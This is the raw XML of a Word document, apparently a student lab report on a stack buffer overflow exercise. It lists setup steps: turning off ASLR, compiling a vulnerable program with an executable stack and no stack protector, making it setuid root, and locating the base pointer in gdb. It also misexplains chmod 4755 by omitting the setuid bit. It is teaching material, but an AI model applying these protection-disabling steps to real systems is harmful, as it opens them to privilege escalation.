          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A6E11AC" w14:textId="77777777" w:rsidR="00EC21B1" w:rsidRPr="000941B1" w:rsidRDefault="00EC21B1" w:rsidP="0058424D">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2547CCF8" w14:textId="132A35F1" w:rsidR="008806FB" w:rsidRPr="000941B1" w:rsidRDefault="00EC21B1" w:rsidP="0058424D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6E998F" w14:textId="77777777" w:rsidR="0069567B" w:rsidRPr="000941B1" w:rsidRDefault="0069567B" w:rsidP="0069567B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0219E3E8" w14:textId="77777777" w:rsidR="0069567B" w:rsidRPr="000941B1" w:rsidRDefault="0069567B" w:rsidP="0069567B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="288EC80C" w14:textId="77777777" w:rsidR="0069567B" w:rsidRPr="000941B1" w:rsidRDefault="0069567B" w:rsidP="0069567B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1335CA14" w14:textId="77777777" w:rsidR="0069567B" w:rsidRPr="000941B1" w:rsidRDefault="0069567B" w:rsidP="0069567B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44843BC2" w14:textId="77777777" w:rsidR="0069567B" w:rsidRPr="000941B1" w:rsidRDefault="0069567B" w:rsidP="0069567B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A2B1273" w14:textId="11960D2D" w:rsidR="00F17B80" w:rsidRPr="000941B1" w:rsidRDefault="001C6D52" w:rsidP="0069567B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Running the example program call_shellcode.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E40817" w14:textId="2E3EF7EC" w:rsidR="001C6D52" w:rsidRPr="000941B1" w:rsidRDefault="001C6D52" w:rsidP="0058424D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>$gcc -z execstack -o call_shellcode call_shellcode.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F51781" w14:textId="01985762" w:rsidR="001C6D52" w:rsidRPr="000941B1" w:rsidRDefault="001C6D52" w:rsidP="0058424D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C5CFA68" wp14:editId="3245D938">
            <wp:extent cx="5943600" cy="2430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30145"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C59F934" w14:textId="582E1BC1" w:rsidR="001C6D52" w:rsidRPr="000941B1" w:rsidRDefault="001C6D52" w:rsidP="0058424D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>The above program is an example program which launches a shell after it is run.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BEB9C38" w14:textId="18D4F9C5" w:rsidR="001C6D52" w:rsidRPr="000941B1" w:rsidRDefault="001C6D52" w:rsidP="0058424D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="676408FC" w14:textId="40EB91C3" w:rsidR="00F17B80" w:rsidRDefault="001C6D52" w:rsidP="0069567B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Running the Attack Project</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2843AB00" w14:textId="57BF29E7" w:rsidR="009979D3" w:rsidRPr="000941B1" w:rsidRDefault="009979D3" w:rsidP="0069567B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>RESULTS</w:t>
      </w:r>
      <w:bookmarkStart w:id="1" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="020D984F" w14:textId="0974DFB3" w:rsidR="00F17B80" w:rsidRPr="000941B1" w:rsidRDefault="00F17B80" w:rsidP="0058424D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Login to as a root and set </w:t>
      </w:r>
      <w:r w:rsidR="00AB6048" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ASLR to 0. This turns the off the ASLR using </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B217CE" w14:textId="15D92D38" w:rsidR="003B65FF" w:rsidRPr="000941B1" w:rsidRDefault="00AB6048" w:rsidP="0058424D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>#sysctl -w kernel.randomize_va_space=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70481E89" w14:textId="77777777" w:rsidR="003B65FF" w:rsidRPr="000941B1" w:rsidRDefault="003B65FF"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1E7650CD" wp14:editId="3C069C05">
            <wp:extent cx="5943600" cy="290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3855"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C872C5" w14:textId="47A86DD2" w:rsidR="003B65FF" w:rsidRPr="000941B1" w:rsidRDefault="003B65FF" w:rsidP="0058424D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6678EAD4" w14:textId="77777777" w:rsidR="00AB6048" w:rsidRPr="000941B1" w:rsidRDefault="00AB6048" w:rsidP="0058424D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Compile the stack.c program using </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BC7371" w14:textId="77777777" w:rsidR="00AB6048" w:rsidRPr="000941B1" w:rsidRDefault="00AB6048" w:rsidP="0058424D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>#gcc -o stack -z execstack -fno-stack-protector stack.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FEC8A82" w14:textId="035A2EA7" w:rsidR="00AB6048" w:rsidRPr="000941B1" w:rsidRDefault="00AB6048"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The stack is set to executable and the Stack Guard is turned off.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030FC425" w14:textId="77777777" w:rsidR="00AB6048" w:rsidRPr="000941B1" w:rsidRDefault="00AB6048"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 xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>#chmod 4755 stack</w:t>
      </w:r>
      <w:r w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF52E1D" w14:textId="60490FF6" w:rsidR="00AB6048" w:rsidRPr="000941B1" w:rsidRDefault="00AB6048"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This provides rwx permissions to the user, rx permissions to the group and  others.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E7B2ED" w14:textId="574AA4C6" w:rsidR="003B65FF" w:rsidRPr="000941B1" w:rsidRDefault="003B65FF"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649C3399" wp14:editId="57744EDF">
            <wp:extent cx="5943600" cy="3366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6770"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A01F76" w14:textId="07ACCBD1" w:rsidR="000941B1" w:rsidRDefault="000941B1" w:rsidP="0058424D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B13D33E" w14:textId="129B9B7D" w:rsidR="009979D3" w:rsidRDefault="009979D3" w:rsidP="0058424D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76A8B318" w14:textId="77777777" w:rsidR="009979D3" w:rsidRPr="000941B1" w:rsidRDefault="009979D3" w:rsidP="0058424D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2371A93E" w14:textId="5A7673DB" w:rsidR="000941B1" w:rsidRPr="000941B1" w:rsidRDefault="000941B1" w:rsidP="0058424D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D478B94" w14:textId="0CC25947" w:rsidR="000941B1" w:rsidRPr="000941B1" w:rsidRDefault="000941B1" w:rsidP="0058424D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16E7A83A" w14:textId="502D6BB9" w:rsidR="000941B1" w:rsidRPr="000941B1" w:rsidRDefault="000941B1" w:rsidP="0058424D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="798A69F3" w14:textId="4E0F95FF" w:rsidR="000941B1" w:rsidRPr="000941B1" w:rsidRDefault="000941B1" w:rsidP="0058424D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46FA4841" w14:textId="0AB2BFAE" w:rsidR="000941B1" w:rsidRPr="000941B1" w:rsidRDefault="000941B1" w:rsidP="0058424D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0670366E" w14:textId="19E4C0A0" w:rsidR="000941B1" w:rsidRPr="000941B1" w:rsidRDefault="000941B1" w:rsidP="0058424D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77BE8979" w14:textId="63ACCE82" w:rsidR="000941B1" w:rsidRPr="000941B1" w:rsidRDefault="000941B1" w:rsidP="0058424D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="777B2C43" w14:textId="4B5DFAC7" w:rsidR="000941B1" w:rsidRPr="000941B1" w:rsidRDefault="000941B1" w:rsidP="0058424D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F6A889F" w14:textId="77777777" w:rsidR="000941B1" w:rsidRPr="000941B1" w:rsidRDefault="000941B1" w:rsidP="0058424D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08C81341" w14:textId="63230AF4" w:rsidR="003B65FF" w:rsidRPr="000941B1" w:rsidRDefault="00AB6048" w:rsidP="0058424D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Use gdb and disassemble the bof function.</w:t>
      </w:r>
      <w:r w:rsidR="002465BD" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275406FC" w14:textId="77777777" w:rsidR="002465BD" w:rsidRPr="000941B1" w:rsidRDefault="002465B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 xml:space="preserve">The assembler code for the function bof is displayed. When we go through the instructions it can be noted that base pointer address is computed at 0x804848a. Add a breakpoint using </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5268255B" w14:textId="53957270" w:rsidR="002465BD" w:rsidRPr="000941B1" w:rsidRDefault="002465B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b *0x804848a at this point.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1C8A9F" w14:textId="3343FE47" w:rsidR="002465BD" w:rsidRPr="000941B1" w:rsidRDefault="002465B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Run the program using the command r.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527EA642" w14:textId="29C9DF99" w:rsidR="002465BD" w:rsidRPr="000941B1" w:rsidRDefault="002465B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 xml:space="preserve">The program stops at the breakpoint. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E976054" w14:textId="77777777" w:rsidR="003B65FF" w:rsidRPr="000941B1" w:rsidRDefault="00076171"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24029622" wp14:editId="12465705">
            <wp:extent cx="5943600" cy="3514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4725"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="10576DCE" w14:textId="77777777" w:rsidR="00076171" w:rsidRPr="000941B1" w:rsidRDefault="00076171" w:rsidP="0058424D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F7071F6" w14:textId="77777777" w:rsidR="002465BD" w:rsidRPr="000941B1" w:rsidRDefault="002465BD" w:rsidP="0058424D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EDE989C" w14:textId="77777777" w:rsidR="002465BD" w:rsidRPr="000941B1" w:rsidRDefault="002465BD" w:rsidP="0058424D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F5C45DF" w14:textId="77777777" w:rsidR="002465BD" w:rsidRPr="000941B1" w:rsidRDefault="002465BD" w:rsidP="0058424D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40D9707E" w14:textId="77777777" w:rsidR="002465BD" w:rsidRPr="000941B1" w:rsidRDefault="002465BD" w:rsidP="0058424D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7853E416" w14:textId="65081DEA" w:rsidR="002465BD" w:rsidRPr="000941B1" w:rsidRDefault="002465BD" w:rsidP="0058424D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0370986A" w14:textId="77777777" w:rsidR="000941B1" w:rsidRPr="000941B1" w:rsidRDefault="000941B1" w:rsidP="0058424D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FC4D7FB" w14:textId="77777777" w:rsidR="002465BD" w:rsidRPr="000941B1" w:rsidRDefault="002465BD" w:rsidP="0058424D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BAD2FCD" w14:textId="46B19606" w:rsidR="002465BD" w:rsidRPr="000941B1" w:rsidRDefault="002465BD" w:rsidP="0058424D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Use the below command to get the Base pointer address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6716FA97" w14:textId="600C1AB8" w:rsidR="002465BD" w:rsidRPr="000941B1" w:rsidRDefault="002465BD" w:rsidP="0058424D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
